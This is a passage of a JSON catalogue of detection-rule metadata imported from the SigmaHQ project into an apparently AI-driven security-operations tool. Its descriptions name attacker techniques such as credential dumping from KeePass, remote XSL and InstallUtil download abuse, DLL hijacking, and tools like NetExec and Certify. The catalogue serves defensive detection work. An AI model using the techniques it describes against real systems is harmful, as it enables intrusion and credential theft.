"provenance": { "source": "SigmaHQ/sigma", "source_id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_scheduled_task_delete_or_disable.yml" } }, { "id": "sigmahq-sigma-759d0d51-bc99-4b5e-9add-8f5b2c8e7512", "type": "detection", "name": "Creation Of An User Account", "description": "Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/creation-of-an-user-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "759d0d51-bc99-4b5e-9add-8f5b2c8e7512", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/syscall/lnx_auditd_create_account.yml" } }, { "id": "sigmahq-sigma-75bf09fa-1dd7-4d18-9af9-dd9e492562eb", "type": "detection", "name": "ADSI-Cache File Creation By Uncommon Tool", "description": "Detects the creation of an \"Active Directory Schema Cache File\" (.sch) file by an uncommon tool.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1001.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/adsi-cache-file-creation-by-uncommon-tool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_adsi_cache_creation_by_uncommon_tool.yml" } }, { "id": "sigmahq-sigma-75bfe6e6-cd8e-429e-91d3-03921e1d7962", "type": "detection", "name": "Remote Access Tool - ScreenConnect Installation Execution", "description": "Detects ScreenConnect program starts that establish a remote access to a system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-screenconnect-installation-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_installation_cli_param.yml" } }, { "id": "sigmahq-sigma-75c505b1-711d-4f68-a357-8c3fe37dbf2d", "type": "detection", "name": "HackTool - SILENTTRINITY Stager DLL Load", "description": "Detects SILENTTRINITY stager dll loading activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-silenttrinity-stager-dll-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_hktl_silenttrinity_stager.yml" } }, { "id": "sigmahq-sigma-75d0a94e-6252-448d-a7be-d953dff527bb", "type": "detection", "name": "Remote XSL Execution Via Msxsl.EXE", "description": "Detects the execution of the \"msxsl\" binary with an \"http\" keyword in the command line. This might indicate a potential remote execution of XSL files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1220" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-xsl-execution-via-msxsl-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "75d0a94e-6252-448d-a7be-d953dff527bb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msxsl_remote_execution.yml" } }, { "id": "sigmahq-sigma-75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", "type": "detection", "name": "Office Application Initiated Network Connection To Non-Local IP", "description": "Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses.\nThis rule aims to detect traffic similar to one seen exploited in CVE-2021-42292.\nThis rule will require an initial baseline and tuning that is specific to your organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/office-application-initiated-network-connection-to-non-local-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_office_outbound_non_local_ip.yml" } }, { "id": "sigmahq-sigma-75e508f7-932d-4ebc-af77-269237a84ce1", "type": "detection", "name": "DLL Loaded From Suspicious Location Via Cmspt.EXE", "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dll-loaded-from-suspicious-location-via-cmspt-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "75e508f7-932d-4ebc-af77-269237a84ce1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_cmstp_load_dll_from_susp_location.yml" } }, { "id": "sigmahq-sigma-75edd216-1939-4c73-8d61-7f3a0d85b5cc", "type": "detection", "name": "File Download Via InstallUtil.EXE", "description": "Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to \"%LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-download-via-installutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_installutil_download.yml" } }, { "id": "sigmahq-sigma-75edd3fd-7146-48e5-9848-3013d7f0282c", "type": "detection", "name": "DHCP Server Error Failed Loading the CallOut DLL", "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dhcp-server-error-failed-loading-the-callout-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "75edd3fd-7146-48e5-9848-3013d7f0282c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config_failed.yml" } }, { "id": "sigmahq-sigma-75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", "type": "detection", "name": "Write Protect For Storage Disabled", "description": "Detects applications trying to modify the registry in order to disable any write-protect property for storage devices.\nThis could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/write-protect-for-storage-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml" } }, { "id": "sigmahq-sigma-760e75d8-c3b5-409b-a9bf-6130b4c4603f", "type": "detection", "name": "Self Extraction Directive File Created In Potentially Suspicious Location", "description": "Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location.\nThese files are used by the \"iexpress.exe\" utility in order to create self extracting packages.\nAttackers were seen abusing this utility and creating PE files with embedded \".sed\" entries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/self-extraction-directive-file-created-in-potentially-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "760e75d8-c3b5-409b-a9bf-6130b4c4603f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_sed_file_creation.yml" } }, { "id": "sigmahq-sigma-7610a4ea-c06d-495f-a2ac-0a696abcfd3b", "type": "detection", "name": "Outbound Network Connection To Public IP Via Winlogon", "description": "Detects a \"winlogon.exe\" process that initiate network communications with public IP addresses", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/outbound-network-connection-to-public-ip-via-winlogon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7610a4ea-c06d-495f-a2ac-0a696abcfd3b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_winlogon_net_connections.yml" } }, { "id": "sigmahq-sigma-762bb580-79b4-40f4-8b9e-9349ce1710f4", "type": "detection", "name": "Indirect Command Execution via SFTP ProxyCommand", "description": "Detects the use of SFTP.exe to execute commands indirectly via ProxyCommand parameter.\nThreat actors were seen leveraging this legitimate Windows binary to bypass security controls and execute arbitrary commands while evading detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/indirect-command-execution-via-sftp-proxycommand.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "762bb580-79b4-40f4-8b9e-9349ce1710f4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sftp_proxy_command_execution.yml" } }, { "id": "sigmahq-sigma-762f2482-ff21-4970-8939-0aa317a886bb", "type": "detection", "name": "HackTool - Certify Execution", "description": "Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-certify-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "762f2482-ff21-4970-8939-0aa317a886bb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_certify.yml" } }, { "id": "sigmahq-sigma-7638e5fe-600c-4289-a968-f49dd537ec7d", "type": "detection", "name": "HackTool - NetExec Execution", "description": "Detects execution of the hacktool NetExec.\nNetExec (formerly CrackMapExec) is a widely used post-exploitation tool designed for Active Directory penetration testing and network enumeration\nIn enterprise environments, the use of NetExec is considered suspicious or potentially malicious because it enables attackers to enumerate hosts, exploit network services, and move laterally across systems.\nThreat actors and red teams commonly use NetExec to identify vulnerable systems, harvest credentials, and execute commands remotely.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1018", "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-netexec-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7638e5fe-600c-4289-a968-f49dd537ec7d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_netexec.yml" } }, { "id": "sigmahq-sigma-76737c19-66ee-4c07-b65a-a03301d1573d", "type": "detection", "name": "GCP Break-glass Container Workload Deployed", "description": "Detects the deployment of workloads that are deployed by using the break-glass flag to override Binary Authorization controls.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/gcp-break-glass-container-workload-deployed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "76737c19-66ee-4c07-b65a-a03301d1573d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_breakglass_container_workload_deployed.yml" } }, { "id": "sigmahq-sigma-7679d464-4f74-45e2-9e01-ac66c5eb041a", "type": "detection", "name": "HackTool - SecurityXploded Execution", "description": "Detects the execution of SecurityXploded Tools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1555" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/hacktool-securityxploded-execution.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_secutyxploded.yml" } }, { "id": "sigmahq-sigma-7692f583-bd30-4008-8615-75dab3f08a99", "type": "detection", "name": "Enable BPF Kprobes Tracing", "description": "Detects common command used to enable bpf kprobes tracing", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/enable-bpf-kprobes-tracing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7692f583-bd30-4008-8615-75dab3f08a99", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml" } }, { "id": "sigmahq-sigma-76f55eaa-d27f-4213-9d45-7b0e4b60bbae", "type": "detection", "name": "Service Reconnaissance Via Wmic.EXE", "description": "An adversary might use WMI to check if a certain remote service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-reconnaissance-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "76f55eaa-d27f-4213-9d45-7b0e4b60bbae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_recon_service.yml" } }, { "id": "sigmahq-sigma-7707a579-e0d8-4886-a853-ce47e4575aaa", "type": "detection", "name": "Wmiprvse Wbemcomn DLL Hijack", "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmiprvse-wbemcomn-dll-hijack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7707a579-e0d8-4886-a853-ce47e4575aaa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml" } }, { "id": "sigmahq-sigma-771d1eb5-9587-4568-95fb-9ec44153a012", "type": "detection", "name": "PUA - NSudo Execution", "description": "Detects the use of NSudo tool for command execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-nsudo-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "771d1eb5-9587-4568-95fb-9ec44153a012", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_nsudo.yml" } }, { "id": "sigmahq-sigma-7745c2ea-24a5-4290-b680-04359cb84b35", "type": "detection", "name": "Path Traversal Exploitation Attempts", "description": "Detects path traversal exploitation attempts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/path-traversal-exploitation-attempts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7745c2ea-24a5-4290-b680-04359cb84b35", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/webserver_generic/web_path_traversal_exploitation_attempt.yml" } }, { "id": "sigmahq-sigma-77564cc2-7382-438b-a7f6-395c2ae53b9a", "type": "detection", "name": "Remote Thread Created In KeePass.EXE", "description": "Detects remote thread creation in \"KeePass.exe\" which could indicates potential password dumping activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1555.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-thread-created-in-keepass-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_remote_thread/create_remote_thread_win_keepass.yml" } }, { "id": "sigmahq-sigma-7773b877-5abb-4a3e-b9c9-fd0369b59b00", "type": "detection", "name": "WMIC Remote Command Execution", "description": "Detects the execution of WMIC to query information on a remote system", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmic-remote-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7773b877-5abb-4a3e-b9c9-fd0369b59b00", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_remote_execution.yml" } }, { "id": "sigmahq-sigma-778ba9a8-45e4-4b80-8e3e-34a419f0b85e", "type": "detection", "name": "TeamViewer Domain Query By Non-TeamViewer Application", "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/teamviewer-domain-query-by-non-teamviewer-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_teamviewer_domain_query_by_uncommon_app.yml" } }, { "id": "sigmahq-sigma-77946e79-97f1-45a2-84b4-f37b5c0d8682", "type": "detection", "name": "Suspicious Registry Modification From ADS Via Regini.EXE", "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-registry-modification-from-ads-via-regini-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regini_ads.yml" } }, { "id": "sigmahq-sigma-7794fa3c-edea-4cff-bec7-267dd4770fd7", "type": "detection", "name": "Clipboard Data Collection Via OSAScript", "description": "Detects possible collection of data from the clipboard via execution of the osascript binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1115", "T1059.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/clipboard-data-collection-via-osascript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7794fa3c-edea-4cff-bec7-267dd4770fd7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_clipboard_data_via_osascript.yml" } }, { "id": "sigmahq-sigma-779c8c12-0eb1-11eb-adc1-0242ac120002", "type": "detection", "name": "Invoke-Obfuscation STDIN+ Launcher - Powershell", "description": "Detects Obfuscated use of stdin to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-stdin-launcher-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "779c8c12-0eb1-11eb-adc1-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml" } }, { "id": "sigmahq-sigma-77caf516-34e5-4df9-b4db-20744fea0a60", "type": "detection", "name": "AWS Successful Console Login Without MFA", "description": "Detects successful AWS console logins that were performed without Multi-Factor Authentication (MFA).\nThis alert can be used to identify potential unauthorized access attempts, as logging in without MFA can indicate compromised credentials or misconfigured security settings.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-successful-console-login-without-mfa.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "77caf516-34e5-4df9-b4db-20744fea0a60", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_console_login_success_without_mfa.yml" } }, { "id": "sigmahq-sigma-77df53a5-1d78-4f32-bc5a-0e7465bd8f41", "type": "detection", "name": "Portable Gpg.EXE Execution", "description": "Detects the execution of \"gpg.exe\" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/portable-gpg-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "77df53a5-1d78-4f32-bc5a-0e7465bd8f41", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 